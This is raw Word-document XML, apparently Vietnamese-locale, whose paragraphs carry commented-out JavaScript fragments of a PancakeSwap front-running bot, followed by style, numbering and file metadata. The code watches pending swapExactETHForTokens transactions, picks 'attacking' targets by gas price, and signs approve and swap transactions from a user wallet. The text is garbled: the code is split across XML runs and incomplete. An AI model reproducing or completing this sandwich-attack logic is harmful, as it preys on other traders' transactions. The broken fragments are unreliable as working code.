    <w:p w14:paraId="3324A7D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//outputeth = outputeth * 0.999;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204815B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0876A85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//await swap(newGasPrice, gasLimit, outputtoken, outputeth, 1, out_token_address, user_wallet, transaction);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B24B95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5AE63C9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//console.log('Sell succeed');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAFDA8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//succeed = true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5F4D2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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592092E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51B0CD49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//async function approve(gasPrice, outputtoken, out_token_address, user_wallet){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C03EC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allowance = await out_token_info.token_contract.methods.allowance(user_wallet.address, PANCAKE_ROUTER_ADDRESS).call();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183599F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5B6120C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//allowance = BigNumber(allowance);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3833500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//outputtoken = BigNumber(outputtoken);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2391FF4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32FBEFE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decimals = BigNumber(10).power(out_token_info.decimals);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062E92D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max_allowance = BigNumber(10000).multiply(decimals);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C2E3A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26A3FF9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//if(outputtoken.gt(max_allowance))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C921F9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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD30A3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//console.log('replace max allowance')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173B034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//max_allowance = outputtoken;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFA3A0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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138FDF1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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116EBEC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6099224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//if(outputtoken.gt(allowance)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC48C5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//console.log(max_allowance.toString());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2848557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approveTX ={</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A04C10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//from: user_wallet.address,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236E05D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//to: out_token_address,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE3740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//gas: 50000,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E6353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//gasPrice: gasPrice*ONE_GWEI,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4894333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//data: out_token_info.token_contract.methods.approve(PANCAKE_ROUTER_ADDRESS, max_allowance).encodeABI()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787D42E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            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 xml:space="preserve">// </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787BAEA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lastRenderedPageBreak/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE7C1F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4509DCD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signedTX = await user_wallet.signTransaction(approveTX);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266A7E2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//var result = await web3.eth.sendSignedTransaction(signedTX.rawTransaction);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E76414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79B454C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//console.log('Approved Token')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16264C4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56486FB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//return;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F1D2D6" w14:textId="77777777" w:rsidR="00740A54" w:rsidRPr="00740A54" w:rsidRDefault="00740A54" w:rsidP="00740A54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5F32270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//select attacking transaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2210BFE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//async function triggersFrontRun(transaction, out_token_address, amount, level) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779E611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11FEE82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//if(attack_started)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1DCAE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//return false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FE07D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6C7F89C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//console.log((transaction.hash).yellow, parseInt(transaction['gasPrice']) / 10**9);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D4E2B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//if(parseInt(transaction['gasPrice']) / 10**9 &gt; 10 &amp;&amp; parseInt(transaction['gasPrice']) / 10**9 &lt; 50){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49098D0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 xml:space="preserve">//var outputtoken = await pancakeRouter.methods.getAmountOut(estimatedInput, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E73E83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219451"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="vi-VN" w:eastAsia="vi-VN"/>
        </w:rPr>
        <w:t>return</w:t>
      </w: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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00740A54">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="5BB498"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="vi-VN" w:eastAsia="vi-VN"/>
        </w:rPr>
        <w:t>0x37E465BE5d3Bed7dDa6C96C044B90E6c82C3fEe2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;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//pool_info.input_volumn.toString(), pool_info.output_volumn.toString()).call();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA1237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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DA1B4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//attack_started = true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5155D34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//return true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64972C1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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16849F9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78EB472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//return false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7514D70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3B8A85D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 (transaction['to'] != PANCAKE_ROUTER_ADDRESS) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3DF9B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//return false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A12B6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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420A22E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19E9924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//let data = parseTx(transaction['input']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309E2A2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>   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC3EB0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//let method = data[0];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1BD1E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2F50F99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//let params = data[1];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5082F76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4B593DE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//let gasPrice = parseInt(transaction['gasPrice']) / 10**9;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A95FF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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D3BA1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2297982B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//if(method == 'swapExactETHForTokens')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB574D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485090C2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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CE39D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//let in_amount = transaction;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638DE55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55A50F1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//let out_min = params[0];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38405A7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17DC60A7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7C74A814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//let path = params[1];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2260F71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7CF2D496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//let in_token_addr = path[0];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD26C0A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458784B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//let out_token_addr = path[path.length-1];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFA319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6B4D965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1A8E819F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//let recept_addr = params[2];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680F72C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33B2F0B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//let deadline = params[3];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CA888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5EE5A020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</w:p>
    <w:p w14:paraId="2A3CE53C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//if(out_token_addr != out_token_address)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D330111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28BCD3F3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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1BE4F8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console.log(out_token_addr.blue)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2BFA2D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 console.log(out_token_address)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E296265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  <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00740A54">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="608B4E"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="vi-VN" w:eastAsia="vi-VN"/>
        </w:rPr>
        <w:t>//return false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B0928E" w14:textId="77777777" w:rsidR="00740A54" w:rsidRPr="00740A54" w:rsidRDefault="00740A54" w:rsidP="00740A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vi-VN" w:eastAsia="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00740A54">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="DCDCDC"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="vi-VN" w:eastAsia="vi-VN"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D278E74" w14:textId="77777777" w:rsidR="00396DDE" w:rsidRPr="00396DDE" w:rsidRDefault="00396DDE" w:rsidP="00396DD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96DDE" w:rsidRPr="0039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7F6C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0964A876"/>
    <w:lvl w:ilvl="0" w:tplc="893099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170C0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="81AAD8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A5EA4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F514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655AF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E0FE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67C64"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5A004B18"/>
    <w:lvl w:ilvl="0" w:tplc="43A0DD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1027E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7890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90623"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="54E8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800F3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3C68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35575"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="640E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591B1B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1426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E46BB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="72A2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555EEF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="332EBDCC"/>
    <w:lvl w:ilvl="0" w:tplc="3EC6A3B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0F6A95"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FB488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924829">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1588266524">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="669991981">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="869954759">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1648432913">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1839730534">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1670017264">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1199705081">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="746223742">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="623005815">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1971207850">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1094977714">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="107415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BD6"/>
    <w:rsid w:val="00011A7D"/>
    <w:rsid w:val="00016A84"/>
    <w:rsid w:val="000419C3"/>
    <w:rsid w:val="00056FB9"/>
    <w:rsid w:val="00070B85"/>
    <w:rsid w:val="00075DCF"/>
    <w:rsid w:val="000C2252"/>
    <w:rsid w:val="000D4473"/>
    <w:rsid w:val="000E16DE"/>
    <w:rsid w:val="00152A01"/>
    <w:rsid w:val="00165FC7"/>
    <w:rsid w:val="00171AA0"/>
    <w:rsid w:val="001F30E9"/>
    <w:rsid w:val="002121AC"/>
    <w:rsid w:val="00245CF5"/>
    <w:rsid w:val="00247790"/>
    <w:rsid w:val="002875BF"/>
    <w:rsid w:val="002B6DE3"/>
    <w:rsid w:val="002C4194"/>
    <w:rsid w:val="002E5567"/>
    <w:rsid w:val="002F1E66"/>
    <w:rsid w:val="0030358D"/>
    <w:rsid w:val="00335428"/>
    <w:rsid w:val="00396DDE"/>
    <w:rsid w:val="003A44EA"/>
    <w:rsid w:val="003B3C2F"/>
    <w:rsid w:val="003F4728"/>
    <w:rsid w:val="00402216"/>
    <w:rsid w:val="004109ED"/>
    <w:rsid w:val="0047113A"/>
    <w:rsid w:val="00476A91"/>
    <w:rsid w:val="0049441F"/>
    <w:rsid w:val="004C691D"/>
    <w:rsid w:val="004F2F07"/>
    <w:rsid w:val="005035CD"/>
    <w:rsid w:val="005049C4"/>
    <w:rsid w:val="00532932"/>
    <w:rsid w:val="00556E2E"/>
    <w:rsid w:val="005741B0"/>
    <w:rsid w:val="00574A1D"/>
    <w:rsid w:val="005905C4"/>
    <w:rsid w:val="005E36D9"/>
    <w:rsid w:val="005E36FC"/>
    <w:rsid w:val="005E79AD"/>
    <w:rsid w:val="005F3059"/>
    <w:rsid w:val="0063206F"/>
    <w:rsid w:val="00652F21"/>
    <w:rsid w:val="00652F63"/>
    <w:rsid w:val="006A31DF"/>
    <w:rsid w:val="006B4239"/>
    <w:rsid w:val="006B5327"/>
    <w:rsid w:val="006E7A92"/>
    <w:rsid w:val="00702367"/>
    <w:rsid w:val="00717778"/>
    <w:rsid w:val="00732392"/>
    <w:rsid w:val="00740A54"/>
    <w:rsid w:val="00755894"/>
    <w:rsid w:val="00772107"/>
    <w:rsid w:val="00774BA6"/>
    <w:rsid w:val="007B7D53"/>
    <w:rsid w:val="007D4C22"/>
    <w:rsid w:val="00800F2C"/>
    <w:rsid w:val="00805FE3"/>
    <w:rsid w:val="008117CF"/>
    <w:rsid w:val="008205F3"/>
    <w:rsid w:val="00844C24"/>
    <w:rsid w:val="008A00B2"/>
    <w:rsid w:val="008B73ED"/>
    <w:rsid w:val="008B7A56"/>
    <w:rsid w:val="008E7E41"/>
    <w:rsid w:val="008F16A5"/>
    <w:rsid w:val="008F4A06"/>
    <w:rsid w:val="008F6069"/>
    <w:rsid w:val="009140E6"/>
    <w:rsid w:val="00917F4A"/>
    <w:rsid w:val="00952006"/>
    <w:rsid w:val="009866A6"/>
    <w:rsid w:val="00987EB7"/>
    <w:rsid w:val="009A52AF"/>
    <w:rsid w:val="009D4790"/>
    <w:rsid w:val="00A044C1"/>
    <w:rsid w:val="00A33D34"/>
    <w:rsid w:val="00A35055"/>
    <w:rsid w:val="00A870C4"/>
    <w:rsid w:val="00AB7F60"/>
    <w:rsid w:val="00AC3000"/>
    <w:rsid w:val="00AE06EC"/>
    <w:rsid w:val="00B2658E"/>
    <w:rsid w:val="00B41A3F"/>
    <w:rsid w:val="00BA1643"/>
    <w:rsid w:val="00BB7175"/>
    <w:rsid w:val="00BD1C9F"/>
    <w:rsid w:val="00BE4583"/>
    <w:rsid w:val="00C041F9"/>
    <w:rsid w:val="00C04E5E"/>
    <w:rsid w:val="00CC0E70"/>
    <w:rsid w:val="00CE1F40"/>
    <w:rsid w:val="00CE274B"/>
    <w:rsid w:val="00D31B5B"/>
    <w:rsid w:val="00D34465"/>
    <w:rsid w:val="00D34AFD"/>
    <w:rsid w:val="00D40121"/>
    <w:rsid w:val="00D5623F"/>
    <w:rsid w:val="00D627A8"/>
    <w:rsid w:val="00D73B52"/>
    <w:rsid w:val="00D87A11"/>
    <w:rsid w:val="00DC5A17"/>
    <w:rsid w:val="00DC6AD0"/>
    <w:rsid w:val="00DE1BD6"/>
    <w:rsid w:val="00E3226C"/>
    <w:rsid w:val="00E52CFE"/>
    <w:rsid w:val="00E649BA"/>
    <w:rsid w:val="00E711D6"/>
    <w:rsid w:val="00EA5859"/>
    <w:rsid w:val="00EB3BCE"/>
    <w:rsid w:val="00F0071E"/>
    <w:rsid w:val="00F17092"/>
    <w:rsid w:val="00F4080D"/>
    <w:rsid w:val="00F831E5"/>
    <w:rsid w:val="00F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435C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{30AB127F-9708-4E5E-A823-52512A78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A11"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00800F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F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A44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06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17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152A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049C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A92"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="vi-VN" w:eastAsia="vi-VN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="msonormal0">
    <w:name w:val="msonormal"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="005E7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77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69447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11</Pages>
  <Words>2127</Words>
  <Characters>12125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10</cp:lastModifiedBy>
  <cp:revision>124</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-07-29T05:16:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-04-12T03:49:00Z</dcterms:modified>
</cp:coreProperties>
</file>